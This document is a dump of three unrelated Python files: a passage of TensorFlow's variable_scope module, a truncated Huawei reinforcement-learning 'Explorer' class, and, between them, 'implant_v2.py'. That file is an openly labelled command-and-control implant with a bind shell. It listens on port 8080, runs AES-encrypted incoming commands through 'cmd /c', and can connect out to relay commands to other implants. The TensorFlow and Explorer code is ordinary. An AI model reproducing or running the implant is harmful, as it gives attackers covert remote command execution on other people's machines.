a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Keep in mind that the counters for `default_name` are discarded once the
parent scope is exited. Therefore when the code re-enters the scope (for
instance by saving it), all nested default_name counters will be restarted.
For instance:
```python
with tf.compat.v1.variable_scope("foo") as vs:
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("a", [1])
assert v.name == "foo/bar/a:0", v.name
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("b", [1])
assert v.name == "foo/bar_1/b:0"
with tf.compat.v1.variable_scope(vs):
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("c", [1])
assert v.name == "foo/bar/c:0" # Uses bar instead of bar_2!
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect for once when creating. You should
only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope, skip_on_eager=False)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope, skip_on_eager=False)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(
name_scope, skip_on_eager=False)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name, skip_on_eager=False)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
try:
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
try:
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg,
traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
shape: shape of the `Tensor` to partition, must have at least two
dimensions.
dtype: dtype of the elements in the `Tensor`.
Returns:
A list with elements >=1 and exactly one >1. The index of that
element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
* initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
* trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
* collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
* validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
* caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
* name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
* dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
* constraint: A constraint function to be applied to the variable after
updates by some algorithms.
* use_resource: if True, a ResourceVariable is always created.
* synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
* aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
* initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
* trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
* validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
* caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
* name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
* constraint: A constraint function to be applied to the variable after
updates by some algorithms.
* synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
* aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
implant_v2.py
|
## Redirector Implant - Encrypted C2 and BindShell
## By ShowNadda
## Version 2.0
## Note: Needs "pycryptodome" Library to be Installed!
# Global Imports
import socket, subprocess, threading, argparse
from Crypto import Cipher
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
# Global Variables
port_default = 8080
buffer_limit = 4096
# AES Encryption Setup
class AESCipher:
def __init__(self, key=None):
self.key = key if key else get_random_bytes(32)
self.cipher = AES.new(self.key, AES.MODE_ECB)
def encrypt(self, plaintext):
return self.cipher.encrypt(pad(plaintext, AES.block_size)).hex()
def decrypt(self, encrypted):
return unpad(self.cipher.decrypt(bytearray.fromhex(encrypted)), AES.block_size)
def __str__(self):
return "AES Key used is = {}".format(self.key.hex())
# Creating the ability to send Encrypted Communications
def encrypted_send(s, msg):
s.send(cipher.encrypt(msg).encode("latin-1"))
# Execute Command
def execute_cmd(cmd):
try:
output = subprocess.check_output("cmd /c {}".format(cmd), stderr=subprocess.STDOUT)
except:
output = b"[!] Error: Command failed!"
return output
# Decode Encrypted Data and strip
def decode_and_strip(s):
return s.decode("latin-1").strip()
# Encrypted Shell
def shell_thread(s):
encrypted_send(s, b"[!] Successfully Connected!!!")
try:
while True:
encrypted_send(s, b"\r\n[ReDi]: ")
data = s.recv(buffer_limit)
if data:
buffer = cipher.decrypt(decode_and_strip(data))
buffer = decode_and_strip(buffer)
if not buffer or buffer == "exit":
s.close()
exit()
print("[!] Now Executing Command: '{}'".format(buffer))
encrypted_send(s, execute_cmd(buffer))
except:
s.close()
exit()
# Creating the ability to send Commands to another Implant
def send_thread(s):
try:
while True:
data = input() + "\n"
encrypted_send(s, data.encode("latin-1"))
except:
s.close()
exit()
# Creating the ability to listen for Commands from other Implants
def recv_thread(s):
try:
while True:
data = decode_and_strip(s.recv(buffer_limit))
if data:
data = cipher.decrypt(data).decode("latin-1")
print(data, end="", flush=True)
except:
s.close()
exit()
# Creating the Server for the Implant to run as
def server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port_default))
s.listen()
print("[!] Redirector Server has started!!!")
while True:
client_socket, addr = s.accept()
print("[+] New Session has started!!!")
threading.Thread(target=shell_thread, args=(client_socket,)).start()
# Creating the Client for the Implant to run as
def client(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port_default))
print("[!] Now Connecting to Redirector Implant!!!")
threading.Thread(target=send_thread, args=(s,)).start()
threading.Thread(target=recv_thread, args=(s,)).start()
# Creates the Commands and their required Arguements
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--listen", action="store_true", help="Create a Redirector Server", required=False)
parser.add_argument("-c", "--connect", help="Connect to a Redirector Server", required=False)
parser.add_argument("-k", "--key", help="Encryption Key", type=str, required=False)
args = parser.parse_args()
# Creates the Error when no Key is provided to connect to another ReDi Implant, but needed
if args.connect and not args.key:
parser.error("[!] Error: Key required to connect to this Implant!!!")
# Creates the Cipher Variable to be used for Encrypted Communications
if args.key:
cipher = AESCipher(bytearray.fromhex(args.key))
else:
cipher = AESCipher()
# Prints the 32-Bit AES Cipher used for Encrypted Communcations
print(cipher)
# Starts the Server or Client modes, depending on Arguements provided
if args.listen:
server()
elif args.connect:
client(args.connect)
|
explorer.py
|
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import signal
import threading
from copy import deepcopy
from absl import logging
from xt.framework.agent_group import AgentGroup
from xt.framework.comm.uni_comm import UniComm
from xt.framework.comm.message import message, get_msg_info, get_msg_data, set_msg_info
from xt.util.logger import set_logging_format
set_logging_format()
class Explorer(object):
""" explorer is used to explore environment to generate train data """
def __init__(self, config_info, broker_id, recv_broker, send_broker):
self.env_para = deepcopy(config_info.get("env_para"))
self.alg_para = deepcopy(config_info.get("alg_para"))
self.agent_para = deepcopy(config_info.get("agent_para"))
self.recv_broker = recv_broker
self.send_broker = send_broker
self.recv_agent = UniComm("LocalMsg")
self.send_agent = UniComm("LocalMsg")
self.explorer_id = self.env_para.get("env_id")
self.broker_id = broker_id
self.rl_agent = None
logging.debug("init explorer with id: {}".format(self.explorer_id))
def start_explore(self):
""" start explore process """
signal.signal(signal.SIGINT, signal.SIG_IGN)
os.environ["CUDA_VISIBLE_DEVICES"] = str(-1)
explored_times = 0
try:
self.rl_agent = AgentGroup(
self.env_para,
self.alg_para,
self.agent_para,
self.send_agent,
self.recv_agent,
)
explore_time = self.agent_para.get("agent_config", {}).get("sync_model_interval", 1)
logging.info("AgentGroup start to explore with sync interval-{}".format(explore_time))
while True:
self.rl_agent.explore(explore_time)
explored_times += explore_time
logging.debug("end explore-{}".format(explored_times))
except BaseException as ex:
logging.exception(ex)
os._exit(4)
def start_data_transfer(self):
""" start transfer data and other thread """
